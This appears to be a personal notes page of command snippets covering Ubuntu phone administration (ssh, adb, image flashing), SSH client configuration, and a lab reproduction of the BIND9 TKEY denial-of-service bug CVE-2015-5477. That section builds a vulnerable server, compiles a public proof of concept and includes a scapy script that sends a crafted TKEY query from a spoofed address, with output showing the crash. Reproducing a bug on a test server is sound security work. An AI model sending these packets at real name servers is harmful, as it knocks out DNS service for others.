# Ubuntu phone: Writeable image and ssh access


$ phablet-config writable-image
$ adb shell
$ sudo su -
# cat /etc/init/ssh.override
manual
exec /usr/sbin/sshd -D
# setprop persist.service.ssh true
# ssh-keygen -A
# service ssh start
# netstat -putan
# reboot
$ ssh phablet@mx4
$ sudo su -
# apt-get update
# apt-get upgrade

# Ubuntu phone: adb (Android Debug Bridge) commands


Architecture

__Phone__                 _______________Host______________
[Daemon]-----<USB/TCP>-----[Server]-----<TCP>-----[Client]
/usr/bin/adbd              /usr/bin/adb -P 5037 fork-server server
                                                  /usr/bin/adb <command>

Commands

$ adb -h
$ adb kill-server
$ adb start-server
$ adb devices -l
$ adb get-state # offline | bootloader | device
$ adb get-serialno
$ adb get-devpath
$ adb status-window # watch 'adb get-state'
$ adb push /local/path /remote/path
$ adb pull /remote/path /local/path
$ adb reboot [bootloader|recovery]
$ adb sync /local/path # pushes only if the local file is newer
$ adb shell [command]

# Ubuntu phone: Image files


$ ubuntu-device-flash query --device=arale --channel=ubuntu-touch/stable/meizu.en --show-image
Device: arale
Description: ubuntu=20150720,device=20150709-8965e37,custom=20150716-819-8-42,version=3
Version: 3
Channel: ubuntu-touch/stable/meizu.en
Files:
 0 https://system-image.ubuntu.com/pool/ubuntu-3f76909df7e5a57984c51d6eb6d56391bef08c637279d7f179cb7bc866b1cbe7.tar.xz 299883524 665847e3b9f79c8179ca4654f1fa47dc678b1aed1565b0925428d11e15fecab6
 1 https://system-image.ubuntu.com/pool/device-9e1719b0b8ad1bb572fbdd49d3e2b7dc6fd382365c0e1b56f4f9d732b656df11.tar.xz 108227112 0622bed0cde446a0cc0fdea0ff131edde225665fb5590a2c744e55b425d37af5
 2 https://system-image.ubuntu.com/pool/custom-a6418398d3c33da55e36ec02b695cdc0bfd45f32fc481d2ff05a1983f866234d.tar.xz 63786376 f8d2459586a0b0518eda9b521a5bc7cb76dbfce18e4677870136e7cc9e86d74b
 3 https://system-image.ubuntu.com/ubuntu-touch/stable/meizu.en/arale/version-3.tar.xz 448 ef14dd19f4e28a2447b37b576961d5e30b8611a212c912ab42c8b4b111e2762b
Metadata   : version.tar.xz
Nexus | BQ | Meizu : custom.tar.xz
Ubuntu   : ubuntu.tar.xz
Nexus 4 | E4.5 | MX4 : device.tar.xz

# Ubuntu phone: ubuntu-device-flash


$ adb devices
$ adb shell grep ro.product.name /system/build.prop
ro.product.name=arale
$ adb shell grep build.id /system/build.prop
ro.build.id=KOT49H
$ adb shell grep ro.product.device /system/build.prop
ro.product.device=arale
$ ubuntu-device-flash query --device=arale --list-channels
$ wget http://people.canonical.com/~alextu/tangxi/recovery/recovery.img
$ adb reboot recovery
$ fastboot flash recovery recovery.img
$ fastboot reboot-bootloader
$ ubuntu-device-flash touch --device=arale --channel=ubuntu-touch/stable/meizu.en --developer-mode --password=1234 --wipe

# CVE-2015-5477: BIND9 TKEY assert DoS


Server

# wget -O bind-9-10-2-p2.tar.gz https://www.isc.org/downloads/file/bind-9-10-2-p2/?version=tar-gz
# tar xvzf bind-9-10-2-p2.tar.gz
# cd bind-9.10.2-P2
# ./configure --without-openssl
# make
# touch /etc/named.conf
# bin/named/named -g

Client

# apt-get install fpdns
# fpdns server_ip
fingerprint (server_ip, server_ip): ISC BIND 9.2.3rc1 -- 9.6.1-P1 [recursion enabled]
# dig @server_ip -c chaos -t txt version.bind +short
"9.10.2-P2"
# wget https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c
# gcc -o tkill tkill.c
# ./tkill server_ip
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] server_ip: Resolving to IP address
[+] server_ip: Resolved to multiple IPs (NOTE)
[+] server_ip: Probing...
[+] Querying version...
[+] server_ip: "9.10.2-P2" 
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
# cat cve-2015-5477.py
from scapy.all import *
from sys import argv

# Minimal reproduction of CVE-2015-5477 (see the reference below): one
# crafted DNS query carrying a TKEY record makes an unpatched BIND 9 hit an
# assertion and exit.  Same effect as the tkill.c tool above, minus its
# version probing; useful for confirming that a patched test server survives.

# Name server under test, taken verbatim from the command line (no validation).
target = argv[1]

# Forged source address from the RFC 5737 TEST-NET-1 documentation range;
# because the source is spoofed, the datagram is exactly the kind of traffic
# that BCP 38 ingress filtering drops and that a resolver's ACLs cannot vouch for.
spoofed = '192.0.2.1'
# Hand-built DNS wire-format query (header, one question, one additional
# record).  The \x00\xf9 type field is TKEY (249) -- the field a detection
# rule for this CVE would key on.
dns_query = '\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x03foo\x03bar\x00\x00\xf9\x00\xff\x03foo\x03bar\x00\x00\x10\x00\xff\x00\x00\x00\x00\x00\x07\x06foobar'

# Sends a single UDP datagram to port 53 on the target from the spoofed
# source.  scapy's send() builds the packet at layer 3, so it needs raw-socket
# privileges (typically root); nothing is read back, so no result is reported.
send(IP(src = spoofed, dst = target) / UDP(dport = 53) / Raw(load = dns_query))
# python cve-2015-5477.py server_ip

Reference

https://github.com/robertdavidgraham/cve-2015-5477

# Avoid sending public keys to SSH servers by default


# cat .ssh/config
Host *
 IdentitiesOnly yes
 PubkeyAuthentication no

#Host example1
# Hostname ssh.example1.org
# Port 22
# User test


#Host example2
# Hostname ssh.example2.org
# IdentityFile ~/.ssh/example2_id_rsa
# PubkeyAuthentication yes

# ssh-keygen -t rsa -b 2048 -C test@ssh.example2.org -f ~/.ssh/example2_id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ~/.ssh/example2_id_rsa.
Your public key has been saved in ~/.ssh/example2_id_rsa.pub.
The key fingerprint is:
4d:4b:d5:3c:ca:db:ed:b4:2b:6f:6e:3d:74:32:f3:31 test@ssh.example2.org

Reference

https://github.com/FiloSottile/whosthere#how-do-i-stop-it